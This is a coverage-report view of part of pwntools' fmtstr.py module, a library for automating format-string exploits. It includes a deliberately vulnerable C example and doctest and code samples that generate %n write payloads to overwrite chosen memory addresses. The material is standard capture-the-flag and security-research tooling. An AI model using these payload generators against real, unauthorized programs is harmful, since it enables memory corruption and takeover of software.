• Home
  • Features
  • Pricing
  • Docs
  • Announcements
  • Sign In

Gallopsled / pwntools / 3797606986

pending completion
3797606986

push

github-actions

GitHub
Merge branch 'dev' into rop_raw_list

3931 of 6599 branches covered (59.57%)

102 of 102 new or added lines in 15 files covered. (100.0%)

12074 of 16876 relevant lines covered (71.55%)

0.72 hits per line

Source File
Press 'n' to go to next uncovered line, 'b' for previous

88.34
/pwnlib/fmtstr.py
1
r"""
2
Provide some tools to exploit format string bug
3

4
Let's use this program as an example:
5

6
::
7

8
    #include <stdio.h>
9
    #include <stdlib.h>
10
    #include <unistd.h>
11
    #include <sys/mman.h>
12
    #define MEMORY_ADDRESS ((void*)0x11111000)
13
    #define MEMORY_SIZE 1024
14
    #define TARGET ((int *) 0x11111110)
15
    int main(int argc, char const *argv[])
16
    {
17
           char buff[1024];
18
           void *ptr = NULL;
19
           int *my_var = TARGET;
20
           ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
21
           if(ptr != MEMORY_ADDRESS)
22
           {
23
                   perror("mmap");
24
                   return EXIT_FAILURE;
25
           }
26
           *my_var = 0x41414141;
27
           write(1, &my_var, sizeof(int *));
28
           scanf("%s", buff);
29
           dprintf(2, buff);
30
           write(1, my_var, sizeof(int));
31
           return 0;
32
    }
33

34
We can automate the exploitation of the process like so:
35

36
    >>> program = pwnlib.data.elf.fmtstr.get('i386')
37
    >>> def exec_fmt(payload):
38
    ...     p = process(program)
39
    ...     p.sendline(payload)
40
    ...     return p.recvall()
41
    ...
42
    >>> autofmt = FmtStr(exec_fmt)
43
    >>> offset = autofmt.offset
44
    >>> p = process(program, stderr=PIPE)
45
    >>> addr = unpack(p.recv(4))
46
    >>> payload = fmtstr_payload(offset, {addr: 0x1337babe})
47
    >>> p.sendline(payload)
48
    >>> print(hex(unpack(p.recv(4))))
49
    0x1337babe
50

51
Example - Payload generation
52
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
53

54
.. code-block:: python
55

56
    # we want to do 3 writes
57
    writes = {0x08041337:   0xbfffffff,
58
              0x08041337+4: 0x1337babe,
59
              0x08041337+8: 0xdeadbeef}
60

61
    # the printf() call already writes some bytes
62
    # for example :
63
    # strcat(dest, "blabla :", 256);
64
    # strcat(dest, your_input, 256);
65
    # printf(dest);
66
    # Here, numbwritten parameter must be 8
67
    payload = fmtstr_payload(5, writes, numbwritten=8)
68

69
Example - Automated exploitation
70
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
71

72
.. code-block:: python
73

74
        # Assume a process that reads a string
75
        # and gives this string as the first argument
76
        # of a printf() call
77
        # It do this indefinitely
78
        p = process('./vulnerable')
79

80
        # Function called in order to send a payload
81
        def send_payload(payload):
82
                log.info("payload = %s" % repr(payload))
83
                p.sendline(payload)
84
                return p.recv()
85

86
        # Create a FmtStr object and give to him the function
87
        format_string = FmtStr(execute_fmt=send_payload)
88
        format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
89
        format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
90
        format_string.execute_writes()
91

92
"""
93
from __future__ import division
1✔
94

95
import logging
1✔
96
import re
1✔
97
from operator import itemgetter
1✔
98
from six.moves import range
1✔
99
from sortedcontainers import SortedList
1✔
100

101
from pwnlib.log import getLogger
1✔
102
from pwnlib.memleak import MemLeak
1✔
103
from pwnlib.util.cyclic import *
1✔
104
from pwnlib.util.fiddling import randoms
1✔
105
from pwnlib.util.packing import *
1✔
106

107
log = getLogger(__name__)
1✔
108

109
SPECIFIER = {
1✔
110
    1: 'hhn',
111
    2: 'hn',
112
    4: 'n',
113
    8: 'lln',
114
}
115

116

117
SZMASK = { sz: (1 << (sz * 8)) - 1 for sz in SPECIFIER }
1✔
118

119
WRITE_SIZE = {
1✔
120
    "byte": 1,
121
    "short": 2,
122
    "int": 4,
123
    "long": 8,
124
}
125

126
def normalize_writes(writes):
1✔
127
    r"""
128
    This function converts user-specified writes to a dict ``{ address1: data1, address2: data2, ... }``
129
    such that all values are raw bytes and consecutive writes are merged to a single key.
130

131
    Examples:
132
        >>> context.clear(endian="little", bits=32)
133
        >>> normalize_writes({0x0: [p32(0xdeadbeef)], 0x4: p32(0xf00dface), 0x10: 0x41414141})
134
        [(0, b'\xef\xbe\xad\xde\xce\xfa\r\xf0'), (16, b'AAAA')]
135
    """
136
    # make all writes flat
137
    writes = { address: flat(data) for address, data in writes.items() }
1✔
138

139
    # merge adjacent writes (and detect overlaps)
140
    merged = []
1✔
141
    prev_end = -1
1✔
142
    for address, data in sorted(writes.items(), key=itemgetter(0)):
1✔
143
        if address < prev_end:
1!
144
            raise ValueError("normalize_writes(): data at offset %d overlaps with previous data which ends at offset %d" % (address, prev_end))
×
145

146
        if address == prev_end and merged:
1✔
147
            merged[-1] = (merged[-1][0], merged[-1][1] + data)
1✔
148
        else:
149
            merged.append((address, data))
1✔
150

151
        prev_end = address + len(data)
1✔
152

153
    return merged
1✔
154

155
# optimization examples (with bytes_written=0)
156
#
157
# 00 05 00 00     -> %n%5c%n
158
# 00 00 05 00 00  -> %n%5c%n
159
# 00 00 05 05 00 05  -> need overlapping writes if numbwritten > 5
160

161
class AtomWrite(object):
1✔
162
    """
163
    This class represents a write action that can be carried out by a single format string specifier.
164

165
    Each write has an address (start), a size and the integer that should be written.
166

167
    Additionally writes can have a mask to specify which bits are important.
168
    While the write always overwrites all bytes in the range [start, start+size) the mask sometimes allows more
169
    efficient execution. For example, assume the current format string counter is at 0xaabb and a write with
170
    with integer = 0xaa00 and mask = 0xff00 needs to be executed. In that case, since the lower byte is not covered
171
    by the mask, the write can be directly executed with a %hn sequence (so we will write 0xaabb, but that is ok
172
    because the mask only requires the upper byte to be correctly written).
173
    """
174
    __slots__ = ( "start", "size", "integer", "mask" )
1✔
175

176
    def __init__(self, start, size, integer, mask=None):
1✔
177
        if mask is None:
1✔
178
            mask = (1 << (8 * size)) - 1
1✔
179
        self.start = int(start)
1✔
180
        self.size = size
1✔
181
        self.integer = int(integer)
1✔
182
        self.mask = int(mask)
1✔
183

184
    def __len__(self):
1✔
185
        return self.size
1✔
186

187
    def __key(self):
1✔
188
        return (self.start, self.size, self.integer, self.mask)
1✔
189

190
    def __eq__(self, other):
1✔
191
        if not isinstance(other, AtomWrite):
×
192
            raise TypeError("comparision not supported between instances of '%s' and '%s'" % (type(self), type(other)))
×
193
        return self.__key() == other.__key()
×
194

195
    def __ne__(self, other):
1✔
196
        return not self.__eq__(other)
×
197

198
    def __hash__(self):
1✔
199
        return hash(self.__key())
1✔
200

201
    def __repr__(self):
1✔
202
        return "AtomWrite(start=%d, size=%d, integer=%#x, mask=%#x)" % (self.start, self.size, self.integer, self.mask)
1✔
203

204
    @property
1✔
205
    def bitsize(self):
1✔
206
        return self.size * 8
1✔
207

208
    @property
1✔
209
    def end(self):
1✔
210
        return self.start + self.size
1✔
211

212
    def compute_padding(self, counter):
1✔
213
        """
214
        This function computes the least amount of padding necessary to execute this write,
215
        given the current format string write counter (how many bytes have been written until now).
216

217
        Examples:
218
            >>> hex(pwnlib.fmtstr.AtomWrite(0x0, 0x2, 0x2345).compute_padding(0x1111))
219
            '0x1234'
220
            >>> hex(pwnlib.fmtstr.AtomWrite(0x0, 0x2, 0xaa00).compute_padding(0xaabb))
221
            '0xff45'
222
            >>> hex(pwnlib.fmtstr.AtomWrite(0x0, 0x2, 0xaa00, 0xff00).compute_padding(0xaabb)) # with mask
223
            '0x0'
224
        """
225
        wanted = self.integer & self.mask
1✔
226
        padding = 0
1✔
227
        while True:
228
            diff = wanted ^ ((counter + padding) & self.mask)
1✔
229
            if not diff: break
1✔
230
            # this masks the least significant set bit and adds it to padding
231
            padding += diff & (diff ^ (diff - 1))
1✔
232
        return padding
1✔
233

234
    def replace(self, start=None, size=None, integer=None, mask=None):
1✔
235
        """
236
        Return a new write with updated fields (everything that is not None is set to the new value)
237
        """
238
        start = self.start if start is None else start
1✔
239
        size = self.size if size is None else size
1✔
240
        integer = self.integer if integer is None else integer
1✔
241
        mask = self.mask if mask is None else mask
1✔
242
        return AtomWrite(start, size, integer, mask)
1✔
243

244
    def union(self, other):
1✔
245
        """
246
        Combine adjacent writes into a single write.
247

248
        Example:
249
            >>> context.clear(endian = "little")
250
            >>> pwnlib.fmtstr.AtomWrite(0x0, 0x1, 0x1, 0xff).union(pwnlib.fmtstr.AtomWrite(0x1, 0x1, 0x2, 0x77))
251
            AtomWrite(start=0, size=2, integer=0x201, mask=0x77ff)
252
        """
253
        assert other.start == self.end, "writes to combine must be continous"
1✔
254
        if context.endian == "little":
1✔
255
            newinteger = (other.integer << self.bitsize) | self.integer
1✔
256
            newmask = (other.mask << self.bitsize) | self.mask
1✔
257
        elif context.endian == "big":
1!
258
            newinteger = (self.integer << other.bitsize) | other.integer
1✔
259
            newmask = (self.mask << other.bitsize) | other.mask
1✔
260
        return AtomWrite(self.start, self.size + other.size, newinteger, newmask)
1✔
261

262
    def __getslice__(self, i,  j):
1✔
263
        return self.__getitem__(slice(i, j))
×
264

265
    def __getitem__(self, i):
1✔
266
        if not isinstance(i, slice):
1!
267
            if i < 0 or i >= self.size:
×
268
                raise IndexError("out of range [0, " + str(self.size) + "): " + str(i))
×
269
            i = slice(i,i+1)
×
270
        start, stop, step = i.indices(self.size)
1✔
271
        if step != 1:
1!
272
            raise IndexError("slices with step != 1 not supported for AtomWrite")
×
273

274
        clip = (1 << ((stop - start) * 8)) - 1
1✔
275
        if context.endian == 'little':
1✔
276
            shift = start * 8
1✔
277
        elif context.endian == 'big':
1!
278
            shift = (self.size - stop) * 8
1✔
279
        return AtomWrite(self.start + start, stop - start, (self.integer >> shift) & clip, (self.mask >> shift) & clip)
1✔
280

281
def make_atoms_simple(address, data, badbytes=frozenset()):
1✔
282
    """
283
    Build format string atoms for writing some data at a given address where some bytes are not allowed
284
    to appear in addresses (such as nullbytes).
285

286
    This function is simple and does not try to minimize the number of atoms. For example, if there are no
287
    bad bytes, it simply returns one atom for each byte:
288
        >>> pwnlib.fmtstr.make_atoms_simple(0x0, b"abc", set())
289
        [AtomWrite(start=0, size=1, integer=0x61, mask=0xff), AtomWrite(start=1, size=1, integer=0x62, mask=0xff), AtomWrite(start=2, size=1, integer=0x63, mask=0xff)]
290
    
291
    If there are bad bytes, it will try to bypass by skipping addresses containing bad bytes, otherwise a
292
    RuntimeError will be raised:
293
        >>> pwnlib.fmtstr.make_atoms_simple(0x61, b'abc', b'\x62')
294
        [AtomWrite(start=97, size=2, integer=0x6261, mask=0xffff), AtomWrite(start=99, size=1, integer=0x63, mask=0xff)]
295
        >>> pwnlib.fmtstr.make_atoms_simple(0x61, b'a'*0x10, b'\x62\x63\x64\x65\x66\x67\x68')
296
        [AtomWrite(start=97, size=8, integer=0x6161616161616161, mask=0xffffffffffffffff), AtomWrite(start=105, size=1, integer=0x61, mask=0xff), AtomWrite(start=106, size=1, integer=0x61, mask=0xff), AtomWrite(start=107, size=1, integer=0x61, mask=0xff), AtomWrite(start=108, size=1, integer=0x61, mask=0xff), AtomWrite(start=109, size=1, integer=0x61, mask=0xff), AtomWrite(start=110, size=1, integer=0x61, mask=0xff), AtomWrite(start=111, size=1, integer=0x61, mask=0xff), AtomWrite(start=112, size=1, integer=0x61, mask=0xff)]
297
    """
298
    data = bytearray(data)
1✔
299
    if not badbytes:
1✔
300
        return [AtomWrite(address + i, 1, d) for i, d in enumerate(data)]
1✔
301

302
    if any(x in badbytes for x in pack(address)):
1!
303
        raise RuntimeError("impossible to avoid a bad byte in starting address %x" % address)
×
304

305
    i = 0
1✔
306
    out = []
1✔
307
    while i < len(data):
1✔
308
        candidate = AtomWrite(address + i, 1, data[i])
1✔
309
        while i + candidate.size < len(data) and any(x in badbytes for x in pack(candidate.end)):
1✔
310
            candidate = candidate.union(AtomWrite(candidate.end, 1, data[i + candidate.size]))
1✔
311

312
        sz = min([s for s in SPECIFIER if s >= candidate.size] + [float("inf")])
1✔
313
        if i + sz > len(data):
1!
314
            raise RuntimeError("impossible to avoid badbytes starting after offset %d (address %x)" % (i, i + address))
×
315
        i += candidate.size
1✔
316
        candidate = candidate.union(AtomWrite(candidate.end, sz - candidate.size, 0, 0))
1✔
317
        out.append(candidate)
1✔
318
    return out
1✔
319

320

321
def merge_atoms_writesize(atoms, maxsize):
1✔
322
    """Merge consecutive atoms based on size.
323

324
    This function simply merges adjacent atoms as long as the merged atom's size is not larger than ``maxsize``.
325

326
    Examples:
327
        >>> from pwnlib.fmtstr import *
328
        >>> merge_atoms_writesize([AtomWrite(0, 1, 1), AtomWrite(1, 1, 1), AtomWrite(2, 1, 2)], 2)
329
        [AtomWrite(start=0, size=2, integer=0x101, mask=0xffff), AtomWrite(start=2, size=1, integer=0x2, mask=0xff)]
330
    """
331
    assert maxsize in SPECIFIER, "write size must be supported by printf"
1✔
332

333
    out = []
1✔
334
    while atoms:
1✔
335
        # look forward to find atoms to merge with
336
        best = (1, atoms[0])
1✔
337
        candidate = atoms[0]
1✔
338
        for idx, atom in enumerate(atoms[1:]):
1✔
339
            if candidate.end != atom.start: break
1!
340

341
            candidate = candidate.union(atom)
1✔
342
            if candidate.size > maxsize: break
1✔
343
            if candidate.size in SPECIFIER:
1!
344
                best = (idx+2, candidate)
1✔
345

346
        out += [best[1]]
1✔
347
        atoms[:best[0]] = []
1✔
348
    return out
1✔
349

350
def find_min_hamming_in_range_step(prev, step, carry, strict):
1✔
351
    """
352
    Compute a single step of the algorithm for find_min_hamming_in_range
353

354
    Arguments:
355
        prev(dict): results from previous iterations
356
        step(tuple): tuple of bounds and target value, (lower, upper, target)
357
        carry(int): carry means allow for overflow of the previous (less significant) byte
358
        strict(int): strict means allow the previous bytes to be bigger than the upper limit (limited to those bytes)
359
                     in lower = 0x2000, upper = 0x2100, choosing 0x21 for the upper byte is not strict because
360
                     then the lower bytes have to actually be smaller than or equal to 00 (0x2111 would not be in
361
                     range)
362
    Returns:
363
        A tuple (score, value, mask) where score equals the number of matching bytes between the returned value and target.
364

365
    Examples:
366
        >>> initial = {(0,0): (0,0,0), (0,1): None, (1,0): None, (1,1): None}
367
        >>> pwnlib.fmtstr.find_min_hamming_in_range_step(initial, (0, 0xFF, 0x1), 0, 0)
368
        (1, 1, 255)
369
        >>> pwnlib.fmtstr.find_min_hamming_in_range_step(initial, (0, 1, 1), 0, 0)
370
        (1, 1, 255)
371
        >>> pwnlib.fmtstr.find_min_hamming_in_range_step(initial, (0, 1, 1), 0, 1)
372
        (0, 0, 0)
373
        >>> pwnlib.fmtstr.find_min_hamming_in_range_step(initial, (0, 1, 0), 0, 1)
374
        (1, 0, 255)
375
        >>> repr(pwnlib.fmtstr.find_min_hamming_in_range_step(initial, (0xFF, 0x00, 0xFF), 1, 0))
376
        'None'
377
    """
378
    lower, upper, value = step
1✔
379
    carryadd = 1 if carry else 0
1✔
380

381
    valbyte = value & 0xFF
1✔
382
    lowbyte = lower & 0xFF
1✔
383
    upbyte = upper & 0xFF
1✔
384

385
    # if we can the requested byte without carry, do so
386
    # requiring strictness if possible is not a problem since strictness will cost at most a single byte
387
    # (so if we don't get our wanted byte without strictness, we may as well require it if possible)
388
    val_require_strict = valbyte > upbyte or valbyte == upbyte and strict
1✔
389
    if lowbyte + carryadd <= valbyte:
1✔
390
        if prev[(0, val_require_strict)]:
1✔
391
            prev_score, prev_val, prev_mask = prev[(0, val_require_strict)]
1✔
392
            return prev_score + 1, (prev_val << 8) | valbyte, (prev_mask << 8) | 0xFF
1✔
393

394
    # now, we have two options: pick the wanted byte (forcing carry), or pick something else
395
    # check which option is better
396
    lowcarrybyte = (lowbyte + carryadd) & 0xFF
1✔
397
    other_require_strict = lowcarrybyte > upbyte or lowcarrybyte == upbyte and strict
1✔
398
    other_require_carry = lowbyte + carryadd > 0xFF
1✔
399
    prev_for_val = prev[(1, val_require_strict)]
1✔
400
    prev_for_other = prev[(other_require_carry, other_require_strict)]
1✔
401
    if prev_for_val and (not prev_for_other or prev_for_other[0] <= prev_for_val[0] + 1):
1✔
402
        return prev_for_val[0] + 1, (prev_for_val[1] << 8) | valbyte, (prev_for_val[2] << 8) | 0xFF
1✔
403
    if prev_for_other:
1✔
404
        return prev_for_other[0], (prev_for_other[1] << 8) | lowcarrybyte, (prev_for_other[2] << 8)
1✔
405
    return None
1✔
406

407
def find_min_hamming_in_range(maxbytes, lower, upper, target):
1✔
408
    """
409
    Find the value which differs in the least amount of bytes from the target and is in the given range.
410

411
    Returns a tuple (count, value, mask) where count is the number of equal bytes and mask selects the equal bytes.
412
    So mask & target == value & target and lower <= value <= upper.
413

414
    Arguments:
415
        maxbytes(int): bytes above maxbytes (counting from the least significant first) don't need to match
416
        lower(int): lower bound for the returned value, inclusive
417
        upper(int): upper bound, inclusive
418
        target(int): the target value that should be approximated
419

420
    Examples:
421
        >>> pp = lambda svm: (svm[0], hex(svm[1]), hex(svm[2]))
422
        >>> pp(pwnlib.fmtstr.find_min_hamming_in_range(1, 0x0, 0x100, 0xaa))
423
        (1, '0xaa', '0xff')
424
        >>> pp(pwnlib.fmtstr.find_min_hamming_in_range(1, 0xbb, 0x100, 0xaa))
425
        (0, '0xbb', '0x0')
426
        >>> pp(pwnlib.fmtstr.find_min_hamming_in_range(1, 0xbb, 0x200, 0xaa))
427
        (1, '0x1aa', '0xff')
428
        >>> pp(pwnlib.fmtstr.find_min_hamming_in_range(2, 0x0, 0x100, 0xaa))
429
        (2, '0xaa', '0xffff')
430
        >>> pp(pwnlib.fmtstr.find_min_hamming_in_range(4, 0x1234, 0x10000, 0x0))
431
        (3, '0x10000', '0xff00ffff')
432
    """
433
    steps = []
1✔
434
    for _ in range(maxbytes):
1✔
435
        steps += [(lower, upper, target)]
1✔
436
        lower = lower >> 8
1✔
437
        upper = upper >> 8
1✔
438
        target = target >> 8
1✔
439

440
    # the initial state
441
    prev = {
1✔
442
        (False,False): (0, 0, 0),
443
        (False,True): None if upper == lower else (0, lower, 0),
444
        (True,False): None if upper == lower else (0, lower, 0),
445
        (True,True): None if upper <= lower + 1 else (0, lower + 1, 0)
446
    }
447
    for step in reversed(steps):
1✔
448
        prev = {
1✔
449
            (carry, strict): find_min_hamming_in_range_step(prev, step, carry, strict )
450
            for carry in [False, True]
451
            for strict in [False, True]
452
        }
453
    return prev[(False,False)]
1✔
454
#
455
# what we don't do:
456
#  - create new atoms that cannot be created by merging existing atoms
457
#  - optimize based on masks
458
def merge_atoms_overlapping(atoms, sz, szmax, numbwritten, overflows):
1✔
459
    """
460
    Takes a list of atoms and merges consecutive atoms to reduce the number of atoms.
461
    For example if you have two atoms ``AtomWrite(0, 1, 1)`` and ``AtomWrite(1, 1, 1)``
462
    they can be merged into a single atom ``AtomWrite(0, 2, 0x0101)`` to produce a short format string.
463

464
    Arguments:
465
        atoms(list): list of atoms to merge
466
        sz(int): basic write size in bytes. Atoms of this size are generated without constraints on their values.
467
        szmax(int): maximum write size in bytes. No atoms with a size larger than this are generated.
468
        numbwritten(int): the value at which the counter starts
469
        overflows(int): how many extra overflows (of size sz) to tolerate to reduce the number of atoms
470

471
    Examples:
472
        >>> from pwnlib.fmtstr import *
473
        >>> merge_atoms_overlapping([AtomWrite(0, 1, 1), AtomWrite(1, 1, 1)], 2, 8, 0, 1)
474
        [AtomWrite(start=0, size=2, integer=0x101, mask=0xffff)]
475
        >>> merge_atoms_overlapping([AtomWrite(0, 1, 1), AtomWrite(1, 1, 1)], 1, 8, 0, 1) # not merged since it causes an extra overflow of the 1-byte counter
476
        [AtomWrite(start=0, size=1, integer=0x1, mask=0xff), AtomWrite(start=1, size=1, integer=0x1, mask=0xff)]
477
        >>> merge_atoms_overlapping([AtomWrite(0, 1, 1), AtomWrite(1, 1, 1)], 1, 8, 0, 2)
478
        [AtomWrite(start=0, size=2, integer=0x101, mask=0xffff)]
479
        >>> merge_atoms_overlapping([AtomWrite(0, 1, 1), AtomWrite(1, 1, 1)], 1, 1, 0, 2) # not merged due to szmax
480
        [AtomWrite(start=0, size=1, integer=0x1, mask=0xff), AtomWrite(start=1, size=1, integer=0x1, mask=0xff)]
481
    """
482
    if not szmax:
1!
483
        szmax = max(SPECIFIER.keys())
×
484

485
    assert 1 <= overflows, "must allow at least one overflow"
1✔
486
    assert sz <= szmax, "sz must be smaller or equal to szmax"
1✔
487

488
    maxwritten = numbwritten + (1 << (8 * sz)) * overflows
1✔
489
    done = [False for _ in atoms]
1✔
490

491
    numbwritten_at = [numbwritten for _ in atoms]
1✔
492
    out = []
1✔
493
    for idx, atom in enumerate(atoms):
1✔
494
        if done[idx]: continue
1✔
495
        numbwritten_here = numbwritten_at[idx]
1✔
496

497
        # greedily find the best possible write at the current offset
498
        # the best write is the one which sets the largest number of target
499
        # bytes correctly
500
        candidate = AtomWrite(atom.start, 0, 0)
1✔
501
        best = (0, None)
1✔
502
        for nextidx, nextatom in enumerate(atoms[idx:], idx):
1✔
503
            # if there is no atom immediately following the current candidate
504
            # that we haven't written yet, stop
505
            if done[nextidx] or candidate.end != nextatom.start:
1✔
506
                break
1✔
507

508
            # extend the candidate with the next atom.
509
            # check that we are still within the limits and that the candidate
510
            # can be written with a format specifier (this excludes non-power-of-2 candidate sizes)
511
            candidate = candidate.union(nextatom)
1✔
512
            if candidate.size not in SPECIFIER: continue
1✔
513
            if candidate.size > szmax: break
1✔
514

515
            # now approximate the candidate if it is larger than the always allowed size (sz),
516
            # taking the `maxwritten` constraint into account
517
            # this ensures that we don't write more than `maxwritten` bytes
518
            approxed = candidate
1✔
519
            score = candidate.size
1✔
520
            if approxed.size > sz:
1✔
521
                score, v, m = find_min_hamming_in_range(approxed.size, numbwritten_here, maxwritten, approxed.integer)
1✔
522
                approxed = candidate.replace(integer=v, mask=m)
1✔
523

524
            # if the current candidate sets more bytes correctly, save it
525
            if score > best[0]:
1✔
526
                best = (score, nextidx, approxed)
1✔
527

528
        _, nextidx, best_candidate = best
1✔
529
        numbwritten_here += best_candidate.compute_padding(numbwritten_here)
1✔
530
        offset = 0
1✔
531

532
        # for all atoms that we merged, check if all bytes are written already to update `done``
533
        # also update the numbwritten_at for all the indices covered by the current best_candidate
534
        for i, iatom in enumerate(atoms[idx:nextidx+1], idx):
1✔
535
            shift = iatom.size
1✔
536

537
            # if there are no parts in the atom's that are not written by the candidate,
538
            # mark it as done
539
            if not (iatom.mask & (~best_candidate[offset:offset+shift].mask)):
1✔
540
                done[i] = True
1✔
541
            else:
542
                # numbwritten_at is only relevant for atoms that aren't done yet,
543
                # so update it only in that case (done atoms are never processed again)
544
                numbwritten_at[i] = max(numbwritten_at[i], numbwritten_here)
1✔
545

546
            offset += shift
1✔
547

548
        # emit the best candidate
549
        out += [best_candidate]
1✔
550
    return out
1✔
551

552
def overlapping_atoms(atoms):
1✔
553
    """
554
    Finds pairs of atoms that write to the same address.
555

556
    Basic examples:
557
        >>> from pwnlib.fmtstr import *
558
        >>> list(overlapping_atoms([AtomWrite(0, 2, 0), AtomWrite(2, 10, 1)])) # no overlaps
559
        []
560
        >>> list(overlapping_atoms([AtomWrite(0, 2, 0), AtomWrite(1, 2, 1)])) # single overlap
561
        [(AtomWrite(start=0, size=2, integer=0x0, mask=0xffff), AtomWrite(start=1, size=2, integer=0x1, mask=0xffff))]
562

563
    When there are transitive overlaps, only the largest overlap is returned. For example:
564
        >>> list(overlapping_atoms([AtomWrite(0, 3, 0), AtomWrite(1, 4, 1), AtomWrite(2, 4, 1)]))
565
        [(AtomWrite(start=0, size=3, integer=0x0, mask=0xffffff), AtomWrite(start=1, size=4, integer=0x1, mask=0xffffffff)), (AtomWrite(start=1, size=4, integer=0x1, mask=0xffffffff), AtomWrite(start=2, size=4, integer=0x1, mask=0xffffffff))]
566

567
    Even though ``AtomWrite(0, 3, 0)`` and ``AtomWrite(2, 4, 1)`` overlap as well that overlap is not returned
568
    as only the largest overlap is returned.
569
    """
570
    prev = None
1✔
571
    for atom in sorted(atoms, key=lambda a: a.start):
1✔
572
        if not prev:
1✔
573
            prev = atom
1✔
574
            continue
1✔
575
        if prev.end > atom.start:
1✔
576
            yield prev, atom
1✔
577
        if atom.end > prev.end:
1✔
578
            prev = atom
1✔
579

580
class AtomQueue(object):
1✔
581
    def __init__(self, numbwritten):
1✔
582
        self.queues = { sz: SortedList(key=lambda atom: atom.integer) for sz in SPECIFIER.keys() }
1✔
583
        self.positions = { sz: 0 for sz in SPECIFIER }
1✔
584
        self.numbwritten = numbwritten
1✔
585

586
    def add(self, atom):
1✔
587
        self.queues[atom.size].add(atom)
1✔
588
        if atom.integer & SZMASK[atom.size] < self.numbwritten & SZMASK[atom.size]:
1✔
589
            self.positions[atom.size] += 1
1✔
590

591
    def pop(self):
1✔
592
        # find queues that still have items left
593
        active_sizes = [ sz for sz,p in self.positions.items() if p < len(self.queues[sz]) ]
1✔
594

595
        # if all queues are exhausted, reset the one for the lowest size atoms
596
        # resetting a queue means the counter overflows (for this size)
597
        if not active_sizes:
1✔
598
            try:
1✔
599
                sz_reset = min(sz for sz,q in self.queues.items() if q)
1✔
600
            except ValueError:
1✔
601
                # all queues are empty, so there are no atoms left
602
                return None
1✔
603

604
            self.positions[sz_reset] = 0
1✔
605
            active_sizes = [sz_reset]
1✔
606

607
        # find the queue that requires the least amount of counter change
608
        best_size = min(active_sizes, key=lambda sz: self.queues[sz][self.positions[sz]].compute_padding(self.numbwritten))
1✔
609
        best_atom = self.queues[best_size].pop(self.positions[best_size])
1✔
610
        self.numbwritten += best_atom.compute_padding(self.numbwritten)
1✔
611

612
        return best_atom
1✔
613

614
def sort_atoms(atoms, numbwritten):
1✔
615
    """
616
    This function sorts atoms such that the amount by which the format string counter has to been increased
617
    between consecutive atoms is minimized.
618

619
    The idea is to reduce the amount of data the the format string has to output to write the desired atoms.
620
    For example, directly generating a format string for the atoms ``[AtomWrite(0, 1, 0xff), AtomWrite(1, 1, 0xfe)]``
621
    is suboptimal: we'd first need to output 0xff bytes to get the counter to 0xff and then output 0x100+1 bytes to
622
    get it to 0xfe again. If we sort the writes first we only need to output 0xfe bytes and then 1 byte to get to 0xff.
623

624
    Arguments:
625
        atoms(list): list of atoms to sort
626
        numbwritten(int): the value at which the counter starts
627

628
    Examples:
629
        >>> from pwnlib.fmtstr import *
630
        >>> sort_atoms([AtomWrite(0, 1, 0xff), AtomWrite(1, 1, 0xfe)], 0) # the example described above
631
        [AtomWrite(start=1, size=1, integer=0xfe, mask=0xff), AtomWrite(start=0, size=1, integer=0xff, mask=0xff)]
632
        >>> sort_atoms([AtomWrite(0, 1, 0xff), AtomWrite(1, 1, 0xfe)], 0xff) # if we start with 0xff it's different
633
        [AtomWrite(start=0, size=1, integer=0xff, mask=0xff), AtomWrite(start=1, size=1, integer=0xfe, mask=0xff)]
634
    """
635
    # find dependencies
636
    #
637
    # in this phase, we determine for which writes we need to preserve order to ensure correctness
638
    # for example, if we have atoms [a, b] as input and b writes to the same address as a, we cannot reorder that
639
    # to [b, a] since then a would overwrite parts of what b wrote.
640
    #
641
    # a depends on b means: a must happen after b --> depgraph[a] contains b
642
    order = { atom: i for i,atom in enumerate(atoms) }
1✔
643

644
    depgraph = { atom: set() for atom in atoms }
1✔
645
    rdepgraph = { atom: set() for atom in atoms }
1✔
646
    for atom1,atom2 in overlapping_atoms(atoms):
1✔
647
        if order[atom1] < order[atom2]:
1!
648
            depgraph[atom2].add(atom1)
1✔
649
            rdepgraph[atom1].add(atom2)
1✔
650
        else:
651
            depgraph[atom1].add(atom2)
×
652
            rdepgraph[atom2].add(atom1)
×
653

654
    queue = AtomQueue(numbwritten)
1✔
655

656
    for atom, deps in depgraph.items():
1✔
657
        if not deps:
1✔
658
            queue.add(atom)
1✔
659

660
    out = []
1✔
661
    while True:
662
        atom = queue.pop()
1✔
663
        if not atom: # we are done
1✔
664
            break
1✔
665

666
        out.append(atom)
1✔
667

668
        # add all atoms that now have no dependencies anymore to the queue
669
        for dep in rdepgraph.pop(atom):
1✔
670
            if atom not in depgraph[dep]:
1!
671
                continue
×
672
            depgraph[dep].discard(atom)
1✔
673
            if not depgraph[dep]:
1!
674
                queue.add(dep)
1✔
675

676
    return out
1✔
677

678
def make_payload_dollar(data_offset, atoms, numbwritten=0, countersize=4):
1✔
679
    r'''
680
    Makes a format-string payload using glibc's dollar syntax to access the arguments.
681

682
    Returns:
683
        A tuple (fmt, data) where ``fmt`` are the format string instructions and data are the pointers
684
        that are accessed by the instructions.
685

686
    Arguments:
687
        data_offset(int): format string argument offset at which the first pointer is located
688
        atoms(list): list of atoms to execute
689
        numbwritten(int): number of byte already written by the printf function
690
        countersize(int): size in bytes of the format string counter (usually 4)
691

692
    Examples:
693
        >>> pwnlib.fmtstr.make_payload_dollar(1, [pwnlib.fmtstr.AtomWrite(0x0, 0x1, 0xff)])
694
        (b'%255c%1$hhn', b'\x00\x00\x00\x00')
695
    '''
696
    data = b""
1✔
697
    fmt = ""
1✔
698

699
    counter = numbwritten
1✔
700
    for idx, atom in enumerate(atoms):
1✔
701
        # set format string counter to correct value
702
        padding = atom.compute_padding(counter)
1✔
703
        counter = (counter + padding) % (1 << (countersize * 8))
1✔
704
        if countersize == 32 and counter > 2147483600:
1!
705
            log.warn("number of written bytes in format string close to 1 << 31. this will likely not work on glibc")
×
706
        if padding >= (1 << (countersize*8-1)):
1!
707
            log.warn("padding is negative, this will not work on glibc")
×
708

709
        # perform write
710
        if padding:
1!
711
            fmt += "%" + str(padding) + "c"
1✔
712
        fmt += "%" + str(data_offset + idx) + "$" + SPECIFIER[atom.size]
1✔
713
        data += pack(atom.start)
1✔
714

715
    return fmt.encode(), data
1✔
716

717
